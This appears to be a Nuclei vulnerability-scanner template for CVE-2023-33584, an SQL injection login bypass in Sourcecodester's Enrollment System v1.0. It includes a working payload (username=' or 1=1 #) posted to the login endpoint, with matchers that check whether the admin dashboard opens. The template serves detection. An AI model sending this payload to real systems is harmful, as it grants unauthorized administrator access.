48 lines
2.1 KiB
YAML
48 lines
2.1 KiB
YAML
id: CVE-2023-33584
|
|
|
|
info:
|
|
name: Enrollment System Project v1.0 - SQL Injection Authentication Bypass
|
|
author: r3Y3r53
|
|
severity: critical
|
|
description: |
|
|
Enrollment System Project V1.0, developed by Sourcecodester, has been found to be vulnerable to SQL Injection (SQLI) attacks. This vulnerability allows an attacker to manipulate the SQL queries executed by the application. The system fails to properly validate user-supplied input in the username and password fields during the login process, enabling an attacker to inject malicious SQL code. By exploiting this vulnerability, an attacker can bypass authentication and gain unauthorized access to the system.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51501
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-33584
|
|
- https://packetstormsecurity.com/files/cve/CVE-2023-33584
|
|
- https://www.sourcecodester.com/php/14444/enrollment-system-project-source-code-using-phpmysql.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2023-33584
|
|
cwe-id: CWE-89
|
|
epss-score: 0.05622
|
|
epss-percentile: 0.92535
|
|
cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: enrollment_system_project
|
|
product: enrollment_system
|
|
tags: packetstorm,cve,cve2023,sqli,exploitdb,unauth,enrollment,enrollment_system_project
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /enrollment/ajax.php?action=login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
username='+or+1%3D1+%23&password={{randstr}}
|
|
- |
|
|
GET /enrollment/index.php?page=home HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains(body_2, "Administrator") && contains(body_2, "Dashboard")'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 490a0046304402202d9e7329610bbc479de009e0e67a8d805ad66413f9be9cd84bb0d1a99fe22d75022057ec9cc10aa8feb0595860b502e20fbb03021513f4a7fef67c44b4758903b29f:922c64590222798bb761d5b6d8e72950 |